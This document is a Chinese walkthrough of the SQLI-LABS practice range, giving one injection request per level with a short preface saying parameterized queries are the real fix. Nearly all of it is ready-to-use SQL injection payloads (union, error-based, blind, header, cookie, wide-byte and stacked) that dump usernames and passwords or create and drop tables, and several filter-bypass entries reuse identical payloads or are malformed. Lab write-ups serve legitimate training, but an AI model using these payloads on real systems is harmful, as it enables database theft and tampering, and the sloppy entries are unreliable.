【靶场】SQLI-LABS通关攻略

前言

本文记录 SQLI-LABS 各关卡的触发请求。各关的区别只在于闭合方式(数字型、'、"、')、"))、回显方式(联合查询、报错、布尔/时间盲注、堆叠)以及过滤规则;后面关卡中的关键字黑名单被逐一绕过,说明黑名单过滤不是可靠的防御,根本修复是使用参数化查询。

SQLI-LABS通关攻略

Page-1 (Basic Challenges)

Less-1

request
GET /Less-1/?id=-1' union select 1,2,group_concat(username,0x3a,password) from users --+

Less-2

request
GET /Less-2/?id=-1 union select 1,2,group_concat(username,0x3a,password) from users --+

Less-3

request
GET /Less-3/?id=-1') union select 1,2,group_concat(username,0x3a,password) from users --+

Less-4

request
GET /Less-4/?id=-1") union select 1,2,group_concat(username,0x3a,password) from users --+

Less-5

request
GET /Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1) --+

Less-6

request
GET /Less-6/?id=1" and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1) --+

Less-7

request
GET /Less-7/?id=1')) and ascii(substr((select database()),1,1))=115 --+

Less-8

request
GET /Less-8/?id=1' and ascii(substr((select database()),1,1))=115 --+

Less-9

request
GET /Less-9/?id=1' and if(ascii(substr(database(),1,1))=115,sleep(3),1) --+

Less-10

request
GET /Less-10/?id=1" and if(ascii(substr(database(),1,1))=115,sleep(3),1) --+

Less-11

request
POST /Less-11/
Content-Type: application/x-www-form-urlencoded

uname=' or 1=1 --+&passwd=1&submit=Submit

Less-12

request
POST /Less-12/
Content-Type: application/x-www-form-urlencoded

uname=-1") union select (select group_concat(username) from users),(select group_concat(password) from users) --+&passwd=1&submit=Submit

Less-13

request
POST /Less-13/
Content-Type: application/x-www-form-urlencoded

uname=admin') and sleep(3) --+&passwd=1&submit=Submit

Less-14

request
POST /Less-14/
Content-Type: application/x-www-form-urlencoded

uname=admin" and sleep(3) --+&passwd=1&submit=Submit

Less-15

request
POST /Less-15/
Content-Type: application/x-www-form-urlencoded

uname=admin' and if(length(database())=8,sleep(3),1) --+&passwd=1&submit=Submit

Less-16

request
POST /Less-16/
Content-Type: application/x-www-form-urlencoded

uname=admin") and if(length(database())=8,sleep(3),1) --+&passwd=1&submit=Submit

Less-17

request
POST /Less-17/
Content-Type: application/x-www-form-urlencoded

uname=admin&passwd=1' and updatexml(1,concat(0x7e,database()),1) --+&submit=Submit

Less-18

  • User-Agent 头注入
request
POST /Less18/
Content-Type: application/x-www-form-urlencoded
User-Agent: 1' or updatexml(1,concat(0x7e,database()),1) or '1

uname=admin&passwd=admin&submit=Submit

Less-19

request
POST /Less19/
Content-Type: application/x-www-form-urlencoded
Referer: 1' or updatexml(1,concat(0x7e,database()),1) or '1

uname=admin&passwd=admin&submit=Submit

Less-20

request
GET /Less-20/index.php
Cookie: uname=-1' union select 1,(select group_concat(username) from users),(select group_concat(password) from users) --+

Page-2 (Advanced Injections)

Less-21

request
GET /Less-21/index.php
Cookie: uname=LTEnKSB1bmlvbiBzZWxlY3QgMSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSkgZnJvbSB1c2VycyksKHNlbGVjdCBncm91cF9jb25jYXQocGFzc3dvcmQpIGZyb20gdXNlcnMpIw%3d%3d

Less-22

request
GET /Less-22/index.php
Cookie: uname=LTEiIHVuaW9uIHNlbGVjdCAxLChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lKSBmcm9tIHVzZXJzKSwoc2VsZWN0IGdyb3VwX2NvbmNhdChwYXNzd29yZCkgZnJvbSB1c2Vycykj

Less-23

request
GET /Less-23/?id=-1' union select 1,(select group_concat(username,0x3a,password) from users),3 or '1'='1

Less-24

  1. 注册admin'#用户
  2. 登录admin'#用户
  3. 修改admin'#用户密码
  4. 退出登录admin'#用户
  5. 登录admin用户,密码为admin'#用户的新密码


Less-25

  • 过滤了 or/and,改用 && 和 || 代替
request
?id=-1' && 1=2 union select 1,2,3 and '1'='1

Less-25a

  • 过滤空格和 or/and
request
?id=-1'%09uNioN%09sElEcT%091,2,3%09&&%09'1'='1

Less-26

  • 过滤空格、注释、or/and
request
?id=-1'%09uNioN%09sElEcT%091,2,3%09&&%09'1'='1

Less-26a

  • 过滤 /*、#、-- 以及空格
request
?id=-1'%0aunion%0aselect%0a1,2,3%0aand%0a'1'='1

Less-27

  • 过滤 union select
request
?id=-1'%09uNioN%09sElEcT%091,2,3%09and%09'1'='1

Less-27a

  • 过滤大小写关键字
request
?id=-1'%09uNioN%09sElEcT%091,2,3%09and%09'1'='1

Less-28

  • 过滤 union select 注释
request
?id=-1' uNioN sElEcT 1,2,3 and '1'='1

Less-28a

  • 多层过滤关键字
request
?id=-1'%09uNioN%09sElEcT%091,2,3%09and%09'1'='1

Less-29

  • 过滤空格,保留引号
request
?id=-1'%09union%09select%091,2,3%09and%09'1'='1

Less-30

  • 数字型过滤空格
request
?id=-1%09union%09select%091,2,3

Less-31

  • 双引号过滤空格
request
?id=-1"%09union%09select%091,2,3%09and%09"1"="1

Less-32

  • 宽字节 GBK %df 绕过 addslashes
request
?id=-1%df' union select 1,2,group_concat(username,0x3a,password) from users --+

Less-33

  • 宽字节 mysql_real_escape_string
request
?id=-1%df' union select 1,2,3 --+

Less-34

  • 宽字节 POST 注入
request
uname 参数:
%df' or 1=1 --+

Less-35

  • 数字型无转义宽字节无影响
request
?id=-1 union select 1,2,3 --+

Less-36

  • 单引号 mysql_real_escape_string 宽字节
request
?id=-1%df' union select 1,2,3 --+

Less-37

  • POST 宽字节注入
request
uname:
%df' union select 1,2 --+

Page-3 (Stacked Injections)

Less-38

  • 堆叠注入多语句
request
?id=1';select group_concat(username,0x3a,password) from users;--+

Less-39

  • 数字型堆叠注入
request
?id=1;select group_concat(username,0x3a,password) from users;--+

Less-40

  • ') 闭合堆叠注入
request
?id=1');select group_concat(username,0x3a,password) from users;--+

Less-41

  • 无过滤数字堆叠
request
?id=1;create table hack like users;--+

Less-42

  • ") 堆叠注入
request
?id=1");select database();--+

Less-43

  • ') 堆叠注入
request
?id=1');show tables;--+

Less-44

  • 双引号堆叠
request
?id=1");select user();--+

Less-45

  • ') 堆叠注入
request
?id=1');select group_concat(table_name) from information_schema.tables where table_schema=database();--+

Less-46

  • 数字堆叠无过滤
request
?id=1;drop table if exists test;create table test(id int);--+

Less-47

  • 单引号堆叠,过滤注释
request
?id=1';select database() and '1'='1

Less-48

  • 过滤 # 和 -- 的堆叠注入
request
?id=1';select database() and '1'='1

Less-49

  • 堆叠 + 空格过滤
request
?id=1';%09select%09database()%09and%09'1'='1

Less-50

  • 数字堆叠空格过滤
request
?id=1;%09select%09database()

Less-51

  • POST 堆叠注入
request
uname:
admin';select database();--+

Less-52

  • POST 数字堆叠
request
uname:
1;select group_concat(username,0x3a,password) from users;--+

Less-53

  • POST ') 堆叠
request
uname:
admin');select database();--+

Page-4 (Challenges)

Less-54

  • 随机闭合 + 过滤关键字盲注
request
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),1) and '1'='1

Less-55

  • 随机 ') 闭合过滤
request
?id=1') and if(ascii(substr(database(),1,1))=115,sleep(2),1) and ('1'='1

Less-56

  • 随机 " 闭合过滤
request
?id=1" and if(ascii(substr(database(),1,1))=115,sleep(2),1) and "1"="1

Less-57

  • 随机数字型过滤
request
?id=1 and if(ascii(substr(database(),1,1))=115,sleep(2),1)

Less-58

  • 单引号无注释严格过滤
request
?id=-1' uNioN sElEcT 1,2,3 and '1'='1

Less-59

  • 双引号无注释过滤
request
?id=-1" uNioN sElEcT 1,2,3 and "1"="1

Less-60

  • 数字型无注释过滤
request
?id=-1 uNioN sElEcT 1,2,3

Less-61

  • POST 单引号随机过滤盲注
request
uname:
admin' and if(length(database())=8,sleep(2),1) and '1'='1

Less-62

  • POST ') 闭合盲注
request
uname:
admin') and if(length(database())=8,sleep(2),1) and ('1'='1

Less-63

  • POST " 闭合盲注
request
uname:
admin" and if(length(database())=8,sleep(2),1) and "1"="1

Less-64

  • POST 数字盲注
request
uname:
1 and if(length(database())=8,sleep(2),1

Less-65

  • POST ") 闭合过滤盲注
request
uname:
admin") and if(length(database())=8,sleep(2),1) and ("1"="1

完成